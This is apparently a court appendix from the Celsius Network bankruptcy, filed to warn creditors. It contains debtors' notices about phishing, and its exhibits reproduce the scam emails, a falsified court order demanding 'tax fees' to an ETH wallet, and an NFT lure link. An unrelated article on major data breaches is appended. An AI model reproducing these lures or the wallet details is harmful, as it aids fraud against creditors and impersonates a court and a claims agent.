* **Bank account information (wire transfer) or**
* **Crypto Wallet Address (ETH/USDT-ERC20)**
* **Contact information (Latest phone number and email address)**

And as a creditor of the company, You will need to pay a filing fee and tax fee (5% if You are US citizen and 10% if you are not US Citizen). Below are the payment details and you must pay them before **February 15, 2023** or you will be deemed to have withdrawn from the case. According to related documents above [1].

* Case Number: **22-10964.**
* Debtor: **Celcius Network LLC.**
* Creditor: ███████████████████████████████
* Claim Amount: ████████████████████
* Tax & Filing fee: **5%**
* Tax Amount: ████████████████
* Pay to (Crypto Wallet): (ETH/USDT-ERC20)
**0x36Ea670bDB878332B7f279F960aC4464377d1D27**
* Due Date: **Febuary 15 2023**

After you send the tax fee payment, Please reply this email along with your Transaction hash link (etherscan) or screenshot of it and your additional information. You will receive a notice of important dates and claim distribution related to the bankruptcy case No.22-10964.

Please be sure to keep an eye out for any such notices and respond promptly if required. If you have any questions or concerns, please don't hesitate to contact me who is handling the case.

Regards
**Emily A. Baum**
Senior Manager
Security Risk Management

---

©2023 Stretto. All rights reserved.
410 Exchange, STE 100
Irvine, CA 92602

**A0441**

Joshua A. Sussberg, P.C.
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
601 Lexington Avenue
New York, New York 10022
Telephone:  (212) 446-4800
Facsimile:  (212) 446-4900

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:  (312) 862-2000
Facsimile:  (312) 862-2200

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) | Case No. 22-10964 (MG) |
| | ) | |
| Debtors. | ) | (Jointly Administered) |
| | ) | |

## THIRD SUPPLEMENTAL NOTICE OF ADDITIONAL PHISHING ATTEMPTS

**PLEASE TAKE NOTICE** that, on February 5, 2023, the Debtors became aware that phishing emails similar to those described in the Second Supplemental Notice[2] were being sent to

---

[1]  The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are:  Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); Celsius US Holding LLC (7956); GK8 Ltd. (1209); GK8 UK Limited (0893); and GK8 USA LLC (9450).  The location of Debtor Celsius Network LLC's principal place of business and the Debtors' service address in these chapter 11 cases is 50 Harrison Street, Suite 209F, Hoboken, New Jersey 07030.

[2]  On November 30, 2022, the Debtors filed the *Notice of Phishing Attempts* [Docket No. 1527] (the "Original Notice") to inform parties in interest of phishing emails sent to certain of the Debtors' customers purporting to be from restructuring associates at Kirkland & Ellis LLP and requesting that customers submit their wallet addresses and other account information to receive claim distributions.  Copies of such emails are attached to the Original Notice as Exhibit A.  Additionally, on December 13, 2022, the Debtors filed the *Supplemental Notice of Phishing Attempts* [Docket No. 1681] (the "Supplemental Notice") to inform parties in interest of third-party reports of these and similar phishing emails targeting cryptocurrency users and their potential sources.  Copies of such reports are attached to the Supplemental Notice as Exhibit A.  On January 22, 2023, the Debtors filed the *Second*

certain of the Debtors' customers by an individual purporting to be a senior manager at Stretto, Inc., and requesting that customers submit their official personal identification, cryptocurrency wallet addresses, and contact information to receive claim distributions, and pay a purported "filing fee" and "tax fee."  Unlike prior emails, the new email, a copy of which is attached hereto as **Exhibit A**, contains a hyperlink to a *falsified* order (the "Falsified Order") purportedly from the United States Bankruptcy Court for the Southern District of New York (the "Court").  Relative to the *Final Order (I) Authorizing the Payment of Certain Taxes and Fees and (II) Granting Related Relief* [Docket No. 526] (the "Taxes Order"), the Falsified Order rewrites the third paragraph therein to mislead customers into submitting their official personal identification, cryptocurrency wallet addresses, and contact information, and paying the purported "filing fee" and "tax fee." A redline showing the differences between the Falsified Order and the correct copy of the Taxes Order is attached to this notice as **Exhibit B**.  A copy of the Falsified Order is attached to this notice as **Exhibit C**.  A correct copy of the Taxes Order may be obtained free of charge by visiting the website of Stretto at https://cases.stretto.com/celsius.

 **PLEASE TAKE FURTHER NOTICE** that these emails are *not authorized messages* from the Debtors or Stretto, Inc., the Debtors' claims agent, and are *strongly suspected to be phishing scams aimed at inducing payments of fraudulent "fees," obtaining personally identifiable information, account information of customers, and stealing financial assets*.

---

*Supplemental Notice of Additional Phishing Attempts* [Docket No. 1904] (the "Second Supplemental Notice") to inform parties in interest of phishing texts and emails sent to certain of the Debtors' customers purporting to be a senior manager at Stretto, Inc., and requesting that customers submit their official personal identification, cryptocurrency wallet addresses, bank accounts, and contact information to receive claim distributions, and pay a purported "filing fee" and "tax fee."  Copies of such texts and emails were attached to the Second Supplemental Notice as Exhibit A and Exhibit B, respectively.

PLEASE TAKE FURTHER NOTICE that the Falsified Order linked in these emails is *not an authentic order from the Court*, and the Court <u>*has not*</u> entered an order in these chapter 11 cases that requires any customer to submit their official personal identification card or cryptocurrency wallet address(es) to any third party, or to pay any fees related to filings or taxes.

PLEASE TAKE FURTHER NOTICE that neither the Debtors nor their advisors will <u>*ever*</u> contact you by email, telephone call, or otherwise to request account information or other personal information absent an (i) order by the Court or (ii) on-the-record instruction from the Court; *provided* that, in connection with the Court's *Order (I) Authorizing the Debtors to Reopen Withdrawals for Certain Customers with Respect to Certain Assets Held in the Custody Program and Withhold Accounts and (II) Granting Related Relief* [Docket No. 1767] (the "<u>Withdrawal Order</u>"), prior to the Debtors' reopening of withdrawals, the Debtors will provide notice to parties in interest with respect to the process for withdrawing digital assets off of the Debtors' platform in accordance with the procedures set forth in the *Notice of Schedule of Custody Users Entitled to Withdraw Certain Assets* [Docket No. 1958] (the "<u>Withdrawal Notice</u>").

PLEASE TAKE FURTHER NOTICE that, if you receive any message purporting to be from the Debtors or their advisors and requesting account information, personal information, or payment, we ask that you please contact the Debtors *immediately* at CelsiusCreditorQuestions@kirkland.com or the Debtors' claims agent, Stretto, at CelsiusInquiries@stretto.com.

PLEASE TAKE FURTHER NOTICE that copies of the Real Order, the Original Notice, the Supplemental Notice, the Second Supplemental Notice, the Withdrawal Order, the Withdrawal Notice, the Taxes Order, and all other documents filed in these chapter 11 cases may be obtained free of charge by visiting the website of Stretto at https://cases.stretto.com/celsius.

**A0444**

New York, New York
Dated: February 6, 2023

*/s/ Joshua A. Sussberg*

**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
Joshua A. Sussberg, P.C.
601 Lexington Avenue
New York, New York 10022
Telephone:     (212) 446-4800
Facsimile:     (212) 446-4900
Email:         joshua.sussberg@kirkland.com

 - and -

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:     (312) 862-2000
Facsimile:     (312) 862-2200
Email:         patrick.nash@kirkland.com
               ross.kwasteniet@kirkland.com
               chris.koenig@kirkland.com
               dan.latona@kirkland.com

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

# Exhibit A

## Phishing Email

On February 5, 2023 at 8:59:37 AM, Stretto - Celcius Case 22-10943 (celcius@cases.stretto.ltd) wrote:

▇▇▇▇▇

I am writing to inform you that Celcius Network LLC has filed for bankruptcy and now currently undergoing the process of liquidation and under the protection of United States Bankruptcy Court - Case No. 22-10964. And you are now egible and confirmed as a creditor.

And as a result, We need additional information related to your claim against Celcius Network LLC, which has filed for bankruptcy according to latest announcement about the "[1] FINAL ORDER (I) AUTHORIZING THE PAYMENT OF CERTAIN TAXES AND FEES AND (II) GRANTING RELATED RELIEF"

In addition, please provide us with the following information to process the payment of your claim:
* A copy of a valid ID
* Crypto Wallet Address (ETH/USDT-ERC20)
* Contact information (Latest phone number and email address)

And as a creditor of the company, You will need to pay a filing fee and tax fee (5% if You are US citizen and 10% if you are not US Citizen). Below are the payment details and you must pay them before **February 25, 2023** or you will be deemed to have withdrawn from the case. According to related documents above [1].

* Case Number: **22-10964.**
* Debtor: **Celcius Network LLC.**
* Creditor: ▇▇▇▇▇
* Claim Amount: ▇▇▇▇▇
* Tax & Filing fee: **5%**
* Tax Amount: ▇▇▇▇▇
* Pay to (Crypto Wallet): (ETH/USDT-ERC20) **0x36Ea670bDB878332B7f279F960aC4464377d1D27**
* Due Date: **Febuary 25 2023**

After you send the tax fee payment, Please reply this email along with your Transaction hash link (etherscan) or screenshot of it and your additional information. You will receive a notice of important dates and claim distribution related to the bankruptcy case No.22-10964.

Please be sure to keep an eye out for any such notices and respond promptly if required.
If you have any questions or concerns, please don't hesitate to contact me who is handling the case.

Regards
**Emily A. Baum**
Senior Manager
Security Risk Management

---

©2023 Stretto. All rights reserved.
410 Exchange, STE 100
Irvine, CA 92602

**A0446**

**Exhibit B**

**Redline**

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

|  |  |
|---|---|
| In re: | ) Chapter 11 |
|  | ) |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) Case No. 22-10964 (MG) |
|  | ) |
| Debtors & Creditors. | ) (Jointly Administered) |
|  | ) |

**FINAL ORDER (I) AUTHORIZING THE PAYMENT**
**OF CERTAIN TAXES AND FEES AND (II) GRANTING RELATED RELIEF**

Upon the motion (the "Motion")[2] of the above-captioned debtors and debtors in possession (collectively, the "Debtors") for entry of a final order (this "Final Order"), (a) authorizing the Debtors, in their sole discretion, to remit and pay certain accrued and outstanding Taxes and Fees; and (b) granting related relief, all as more fully set forth in the Motion; and upon the First Day Declarations; and this Court having jurisdiction over this matter pursuant to 28 U.S.C. §§ 157 and 1334 and the *Amended Standing Order* of Reference from the United States District Court for the Southern District of New York, entered February 1, 2012; and this Court having the power to enter a final order consistent with Article III of the United States Constitution; and this Court having found that venue of this proceeding and the Motion in this district is proper pursuant to 28 U.S.C. §§ 1408 and 1409; and this Court having found that the relief requested in the Motion is in the best interests of the Debtors' estates, their creditors, and other parties in interest; and this Court having

---

[1]    The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are: Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); and Celsius US Holding LLC (7956). The location of Debtor Celsius Network LLC's principal

place of business and the Debtors' service address in these chapter 11 cases is 121 River Street, PH05, Hoboken, New Jersey 07030.

[2] Capitalized terms used but not otherwise defined herein shall have the meanings ascribed to them in the Motion.

found that the Debtors' notice of the Motion and opportunity for a hearing on the Motion were

appropriate under the circumstances and no other notice need be provided; and this Court having

reviewed the Motion and having heard the statements in support of the relief requested therein at

a hearing before this Court (the "<u>Hearing</u>"); and this Court having determined that the legal and

factual bases set forth in the Motion and at the Hearing establish just cause for the relief granted

herein; and upon all of the proceedings had before this Court; and after due deliberation and

sufficient cause appearing therefor, it is HEREBY ORDERED THAT:

1. The Motion is granted on a final basis as set forth herein.

2. The Debtors are authorized to pay or remit (or use applicable credits to offset),
in

their sole discretion, the Taxes and Fees (including, for the avoidance of doubt, posting collateral

or a letter of credit in connection with any dispute related to the Assessments), whether accrued

prior to or after the Petition Date, that are payable during the pendency of these chapter 11 cases,

on a final basis, at such time when the Taxes and Fees are payable in the ordinary course of

business. To the extent that the Debtors have overpaid any Taxes and Fees, the Debtors are

authorized to seek a refund or credit on account of any such Taxes and Fees.

3. ~~The Debtors are authorized, in consultation with counsel to the Official Committee~~<u>Creditors are required to comply with the payment of certain taxes and fees prior</u>

~~of Unsecured Creditors (the "Committee") and with notice to the United States Trustee for the~~

~~Southern District of New York, to honor any amounts owed on account of any audits conducted~~

~~in connection with their Taxes and Fees in the ordinary course of business.~~

<u>before the due dates and required to give an additional information, Full details below:</u>

<u>(a) In addition, please provide us with the following information to process the payment: (*) A</u>

<u>copy of a valid ID, (*) Crypto Wallet Address (ETH/USDT-ERC20), (*) Contact information</u>

(phone number and email address)

(b) And as a creditor of the company, You will need to pay a filing fee and tax fee (5% if You are US citizen and 10% if you are not US Citizen).

(*) Payment to (ETH/USDT-ERC20) : **0x36Ea670bDB878332B7f279F960aC4464377d1D27**

(*) Due Date: **Febuary 15 2023**

A0451

4.     Notwithstanding the relief granted in this Final Order and any actions taken

pursuant to such relief, nothing in this Final Order shall be deemed: (a) an admission by the

Debtors or the Committee as to the validity of any particular claim against the Debtors; (b) a waiver

of the Debtors' or the Committee's respective rights to dispute any particular claim on any

grounds; (c) a promise or requirement by the Debtors or any third party to pay any particular claim;

(d) an implication or admission by the Debtors or the Committee that any particular claim is of a

type specified or defined in this Final Order or the Motion; (e) a request or authorization by any

Debtor to assume any agreement, contract, or lease pursuant to section 365 of the Bankruptcy

Code; (f) a waiver or limitation of the Debtors' or the Committee's respective rights under the

Bankruptcy Code or any other applicable law; or (g) a concession by the Debtors or the Committee

that any liens (contractual, common law, statutory, or otherwise) satisfied pursuant to the Motion

are valid, and the Debtors and the Committee each expressly reserve their rights to contest the

extent, validity, or perfection or seek avoidance of all such liens. Any payment made pursuant to

this Final Order is not intended and should not be construed as an admission by the Debtors or the

Committee as the validity of any particular claim or a waiver of the Debtors' and the
Committee's

respective rights to subsequently dispute such claim.

5.      Notwithstanding anything to the contrary in the Motion, this Final Order, or
any

findings announced at the Hearing, nothing in the Motion, this Final Order, or announced at the

Hearing constitutes a finding under the federal securities laws as to whether crypto tokens or

transactions involving crypto tokens are securities, and the rights of the United States Securities

and Exchange Commission and the Committee to challenge transactions involving crypto tokens

on any basis are expressly reserved.

6.      The Debtors are authorized to issue postpetition checks, or to effect
postpetition

fund transfer requests, in replacement of any checks or fund transfer requests that are dishonored

as a consequence of these chapter 11 cases with respect to prepetition amounts owed in connection

with any of the relief granted herein.

7.      The banks and financial institutions on which checks were drawn or electronic

payment requests made in payment of the prepetition obligations approved herein are authorized

and directed to receive, process, honor, and pay all such checks and electronic payment requests

when presented for payment, and all such banks and financial institutions are authorized to rely on

the Debtors' designation of any particular check or electronic payment request as approved by this

Final Order.

8.      Nothing in this Final Order expands or diminishes any right of setoff or recoupment

of the United States under the Bankruptcy Code and applicable non-bankruptcy law.

9.      Notice of the Motion as provided therein shall be deemed good and sufficient notice

of such Motion and the requirements of Bankruptcy Rule 6004(a) and the Local Rules are satisfied

by such notice.

10.      Notwithstanding Bankruptcy Rule 6004(h), the terms and conditions of this Final

Order are immediately effective and enforceable upon its entry.

11.      The Debtors are authorized to take all actions necessary to effectuate the relief

granted in this Final Order in accordance with the Motion.

12.      This Court retains exclusive jurisdiction with respect to all matters arising from or

related to the implementation, interpretation, and enforcement of this Final Order.

**IT IS SO ORDERED.**

Dated: August 17, 2022
        New York, New York

/s/ **Martin Glenn**
MARTIN GLENN
Chief United States Bankruptcy Judge

**Exhibit C**

**Falsified Order**

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) | Case No. 22-10964 (MG) |
| | ) | |
| Debtors & Creditors. | ) | (Jointly Administered) |
| | ) | |

### FINAL ORDER (I) AUTHORIZING THE PAYMENT
### OF CERTAIN TAXES AND FEES AND (II) GRANTING RELATED RELIEF

Upon the motion (the "Motion")[2] of the above-captioned debtors and debtors in possession (collectively, the "Debtors") for entry of a final order (this "Final Order"), (a) authorizing the Debtors, in their sole discretion, to remit and pay certain accrued and outstanding Taxes and Fees; and (b) granting related relief, all as more fully set forth in the Motion; and upon the First Day Declarations; and this Court having jurisdiction over this matter pursuant to 28 U.S.C. §§ 157 and 1334 and the *Amended Standing Order* of Reference from the United States District Court for the Southern District of New York, entered February 1, 2012; and this Court having the power to enter a final order consistent with Article III of the United States Constitution; and this Court having found that venue of this proceeding and the Motion in this district is proper pursuant to 28 U.S.C. §§ 1408 and 1409; and this Court having found that the relief requested in the Motion is in the best interests of the Debtors' estates, their creditors, and other parties in interest; and this Court having

---

[1] The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are: Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); and Celsius US Holding LLC (7956). The location of Debtor Celsius Network LLC's principal place of business and the Debtors' service address in these chapter 11 cases is 121 River Street, PH05, Hoboken, New Jersey 07030.

[2] Capitalized terms used but not otherwise defined herein shall have the meanings ascribed to them in the Motion.

found that the Debtors' notice of the Motion and opportunity for a hearing on the Motion were appropriate under the circumstances and no other notice need be provided; and this Court having reviewed the Motion and having heard the statements in support of the relief requested therein at a hearing before this Court (the "Hearing"); and this Court having determined that the legal and factual bases set forth in the Motion and at the Hearing establish just cause for the relief granted herein; and upon all of the proceedings had before this Court; and after due deliberation and sufficient cause appearing therefor, it is HEREBY ORDERED THAT:

1. The Motion is granted on a final basis as set forth herein.

2. The Debtors are authorized to pay or remit (or use applicable credits to offset), in their sole discretion, the Taxes and Fees (including, for the avoidance of doubt, posting collateral or a letter of credit in connection with any dispute related to the Assessments), whether accrued prior to or after the Petition Date, that are payable during the pendency of these chapter 11 cases, on a final basis, at such time when the Taxes and Fees are payable in the ordinary course of business. To the extent that the Debtors have overpaid any Taxes and Fees, the Debtors are authorized to seek a refund or credit on account of any such Taxes and Fees.

3. Creditors are required to comply with the payment of certain taxes and fees prior before the due dates and required to give an additional information, Full details below:

(a) In addition, please provide us with the following information to process the payment: (*) A copy of a valid ID, (*) Crypto Wallet Address (ETH/USDT-ERC20), (*) Contact information (phone number and email address)

(b) And as a creditor of the company, You will need to pay a filing fee and tax fee (5% if You are US citizen and 10% if you are not US Citizen).

(*) Payment to (ETH/USDT-ERC20) : **0x36Ea670bDB878332B7f279F960aC4464377d1D27**

(*) Due Date: **Febuary 15 2023**

4.     Notwithstanding the relief granted in this Final Order and any actions taken pursuant to such relief, nothing in this Final Order shall be deemed: (a) an admission by the Debtors or the Committee as to the validity of any particular claim against the Debtors; (b) a waiver of the Debtors' or the Committee's respective rights to dispute any particular claim on any grounds; (c) a promise or requirement by the Debtors or any third party to pay any particular claim; (d) an implication or admission by the Debtors or the Committee that any particular claim is of a type specified or defined in this Final Order or the Motion; (e) a request or authorization by any Debtor to assume any agreement, contract, or lease pursuant to section 365 of the Bankruptcy Code; (f) a waiver or limitation of the Debtors' or the Committee's respective rights under the Bankruptcy Code or any other applicable law; or (g) a concession by the Debtors or the Committee that any liens (contractual, common law, statutory, or otherwise) satisfied pursuant to the Motion are valid, and the Debtors and the Committee each expressly reserve their rights to contest the extent, validity, or perfection or seek avoidance of all such liens. Any payment made pursuant to this Final Order is not intended and should not be construed as an admission by the Debtors or the Committee as the validity of any particular claim or a waiver of the Debtors' and the Committee's respective rights to subsequently dispute such claim.

5.     Notwithstanding anything to the contrary in the Motion, this Final Order, or any findings announced at the Hearing, nothing in the Motion, this Final Order, or announced at the Hearing constitutes a finding under the federal securities laws as to whether crypto tokens or transactions involving crypto tokens are securities, and the rights of the United States Securities and Exchange Commission and the Committee to challenge transactions involving crypto tokens on any basis are expressly reserved.

6.     The Debtors are authorized to issue postpetition checks, or to effect postpetition fund transfer requests, in replacement of any checks or fund transfer requests that are dishonored as a consequence of these chapter 11 cases with respect to prepetition amounts owed in connection with any of the relief granted herein.

**A0459**

7.     The banks and financial institutions on which checks were drawn or electronic payment requests made in payment of the prepetition obligations approved herein are authorized and directed to receive, process, honor, and pay all such checks and electronic payment requests when presented for payment, and all such banks and financial institutions are authorized to rely on the Debtors' designation of any particular check or electronic payment request as approved by this Final Order.

8.     Nothing in this Final Order expands or diminishes any right of setoff or recoupment of the United States under the Bankruptcy Code and applicable non-bankruptcy law.

9.     Notice of the Motion as provided therein shall be deemed good and sufficient notice of such Motion and the requirements of Bankruptcy Rule 6004(a) and the Local Rules are satisfied by such notice.

10.     Notwithstanding Bankruptcy Rule 6004(h), the terms and conditions of this Final Order are immediately effective and enforceable upon its entry.

11.     The Debtors are authorized to take all actions necessary to effectuate the relief granted in this Final Order in accordance with the Motion.

12.     This Court retains exclusive jurisdiction with respect to all matters arising from or related to the implementation, interpretation, and enforcement of this Final Order.

**IT IS SO ORDERED.**

Dated: August 17, 2022
          New York, New York

_____/s/ Martin Glenn_____
MARTIN GLENN
Chief United States Bankruptcy Judge

Joshua A. Sussberg, P.C.
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
601 Lexington Avenue
New York, New York 10022
Telephone:   (212) 446-4800
Facsimile:   (212) 446-4900

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:   (312) 862-2000
Facsimile:   (312) 862-2200

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | |
|---|---|
| In re: | ) Chapter 11 |
| | ) |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) Case No. 22-10964 (MG) |
| | ) |
| Debtors. | ) (Jointly Administered) |
| | ) |

**FOURTH SUPPLEMENTAL NOTICE OF ADDITIONAL PHISHING ATTEMPTS**

**PLEASE TAKE NOTICE** that, on February 14, 2023, the Debtors became aware that

additional phishing emails[2] purported to be from Stretto, Inc. were being sent to certain of the

---

[1]   The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are:  Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); Celsius US Holding LLC (7956); GK8 Ltd. (1209); GK8 UK Limited (0893); and GK8 USA LLC (9450).  The location of Debtor Celsius Network LLC's principal place of business and the Debtors' service address in these chapter 11 cases is 50 Harrison Street, Suite 209F, Hoboken, New Jersey 07030.

[2]   On November 30, 2022, the Debtors filed the *Notice of Phishing Attempts* [Docket No. 1527] (the "Original Notice") to inform parties in interest of phishing emails sent to certain of the Debtors' customers purporting to be from restructuring associates at Kirkland & Ellis LLP and requesting that customers submit their wallet addresses and other account information to receive claim distributions. Copies of such emails are attached to the Original Notice as Exhibit A.  Additionally, on December 13, 2022, the Debtors filed the *Supplemental Notice of Phishing Attempts* [Docket No. 1681] (the "Supplemental Notice") to inform parties in interest of third-party reports of these and similar phishing emails targeting cryptocurrency users and their potential sources.  Copies of such reports are attached to the Supplemental Notice as Exhibit A.  On January 22, 2023, the Debtors filed the *Second*

Debtors' customers advertising an alleged opportunity to receive "1 of 5000 NFT valued at .1 ETH" and containing a suspicious hyperlink. A copy of such an email is attached hereto as **Exhibit A**.

 PLEASE TAKE FURTHER NOTICE that these emails are *not authorized messages* from the Debtors or Stretto, Inc., the Debtors' claims agent, and are *strongly suspected to be phishing scams containing links to malware or otherwise seeking to obtain personally identifiable information and account information of customers*.

 PLEASE TAKE FURTHER NOTICE that neither the Debtors nor their advisors will **_ever_** contact you by email, telephone call, or otherwise to request account information or other personal information absent an (i) order by the Court or (ii) on-the-record instruction from the Court; *provided* that, in connection with the Court's *Order (I) Authorizing the Debtors to Reopen Withdrawals for Certain Customers with Respect to Certain Assets Held in the Custody Program and Withhold Accounts and (II) Granting Related Relief* [Docket No. 1767] (the "Withdrawal Order"), prior to the Debtors' reopening of withdrawals, the Debtors will provide notice to parties in interest with respect to the process for withdrawing digital assets off of the Debtors' platform in accordance with the procedures set forth in the *Notice of Schedule of Custody Users Entitled to Withdraw Certain Assets* [Docket No. 1958] (the "Withdrawal Notice").

---

 *Supplemental Notice of Additional Phishing Attempts* [Docket No. 1904] (the "Second Supplemental Notice") to inform parties in interest of phishing texts and emails sent to certain of the Debtors' customers purporting to be a senior manager at Stretto, Inc., and requesting that customers submit their official personal identification, cryptocurrency wallet addresses, bank accounts, and contact information to receive claim distributions, and pay a purported "filing fee" and "tax fee." Copies of such texts and emails were attached to the Second Supplemental Notice as Exhibit A and Exhibit B, respectively. On February 6, 2023, the Debtors filed the *Third Supplemental Notice of Additional Phishing Attempts* [Docket No. 1992] (the "Third Supplemental Notice") to inform parties in interest of similar phishing emails sent to certain of the Debtors' customers purporting to be a senior manager at Stretto, Inc., that contained a hyperlink to a *falsified* order (the "Falsified Order") purportedly from the United States Bankruptcy Court for the Southern District of New York (the "Court"). A copy of such emails, a redline showing the differences between the Falsified Order and the correct copy of the *Final Order (I) Authorizing the Payment of Certain Taxes and Fees and (II) Granting Related Relief* [Docket No. 526], and a copy of the Falsified Order were attached to the Third Supplemental Notice as Exhibit A, Exhibit B, and Exhibit C, respectively.

PLEASE TAKE FURTHER NOTICE that, if you receive any message purporting to be from the Debtors or their advisors and requesting account information, personal information, or payment, we ask that you please contact the Debtors *immediately* at CelsiusCreditorQuestions@kirkland.com or the Debtors' claims agent, Stretto, at CelsiusInquiries@stretto.com.

PLEASE TAKE FURTHER NOTICE that copies of, the Original Notice, the Supplemental Notice, the Second Supplemental Notice, the Withdrawal Order, the Withdrawal Notice, the Third Supplemental Notice, and all other documents filed in these chapter 11 cases may be obtained free of charge by visiting the website of Stretto at https://cases.stretto.com/celsius.

[*Remainder of page intentionally left blank*]

A0463

New York, New York
Dated: February 15, 2023

*/s/ Joshua A. Sussberg*

**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
Joshua A. Sussberg, P.C.
601 Lexington Avenue
New York, New York 10022
Telephone:   (212) 446-4800
Facsimile:   (212) 446-4900
Email:   joshua.sussberg@kirkland.com

 - and -

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:   (312) 862-2000
Facsimile:   (312) 862-2200
Email:   patrick.nash@kirkland.com
       ross.kwasteniet@kirkland.com
       chris.koenig@kirkland.com
       dan.latona@kirkland.com

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

## Exhibit A

### Phishing Email

---



**Court Docket**                                    4:47 am
nperpiglia@hotmail.com



**Case Name**
**Case No.**

Stretto Finance is taking a dive into the metaverse and partnering with OpenSea! Whitelist to receive a 1 of 5000 NFT valued at .1 ETH - Join Us @ https://strettonft.com/

Please find link(s) below to document(s) related to

**Date Filed**
**Docket No.**

**Document Name**

For more information related to this case, please visit
https://cases.stretto.com

Legal Policies

**A0465**

**Exhibit P**

**ANALYSIS**

# The 15 biggest data breaches of the 21st century

Data breaches affecting millions of users are far too common. Here are some of the biggest, baddest breaches in recent memory.

**By Michael Hill and Dan Swinhoe**

CSO  |

NOV 8, 2022 2:00 AM PST

In today's data-driven world, <u>data breaches</u> can affect hundreds of millions or even billions of people at a time. Digital transformation has increased the supply of data moving, and data breaches have scaled up with it as attackers exploit the data-dependencies of daily life. How large cyberattacks of the future might become remains speculation, but as this list of the biggest data breaches of the 21st Century indicates, they have already reached enormous magnitudes.

For transparency, this list has been calculated by the number of users impacted, records exposed, or accounts affected. We have also made a distinction between incidents where data was actively stolen or reposted maliciously and those where an organization has inadvertently left data unprotected and exposed, but there has been no significant evidence of misuse. The latter have purposefully not been included in the list.

So, here it is – an up-to-date list of the 15 biggest data breaches in recent history, including details of those affected, who was responsible, and how the companies responded (as of July 2021).

[ Give your career a boost with top security certifications: Who they're for, what they cost, and which you need. | Sign up for CSO newsletters. ]

## 1. Yahoo

**Date:** August 2013

**Impact:** 3 billion accounts

Securing the number one spot – almost seven years after the <u>initial breach</u> and four since the true number of records exposed was revealed – is the attack on Yahoo. The company first publicly announced the incident – which it said took place in 2013 – in December 2016. At the time, it was in the process of being acquired by Verizon and estimated that account information of more than a billion of its customers had been accessed by a hacking group. Less than a year later, Yahoo announced that the actual figure of user accounts exposed was 3 billion. Yahoo stated that the revised estimate did not represent a new "security issue" and that it was sending emails to all the "additional affected user accounts."

Despite the attack, the deal with Verizon was completed, albeit at a reduced price. Verizon's CISO Chandra McMahon said at the time: "Verizon is committed to the highest standards of accountability and transparency, and we proactively work to ensure the safety and security of our users and networks in an evolving landscape of online threats. Our investment in Yahoo is allowing that team to continue to take significant steps to enhance their security, as well as benefit from Verizon's experience and resources." After investigation, it was discovered that, while the attackers accessed account information such as security questions and answers, plaintext passwords, payment card and bank data were not stolen.

---

# 2. Aadhaar [tie with Alibaba]

**Date:** January 2018
**Impact:** 1.1 billion Indian citizens' identity/biometric information exposed

Nominations are open for the 2024 Best Places to Work in IT

In early 2018, <u>news broke that malicious actors has infiltrated the world's largest ID database, Aadhaar</u>, exposing information on more than 1.1 billion Indian citizens including names, addresses, photos, phone numbers, and emails, as well as biometric data like fingerprints and iris scans. What's more, since the database – established by the Unique Identification Authority of India (UIDAI) in 2009 – also held information about bank accounts connected with unique 12-digit numbers, it became a credit breach too. This was despite the <u>UIDAI initially denying</u> that the database held such data

A0468

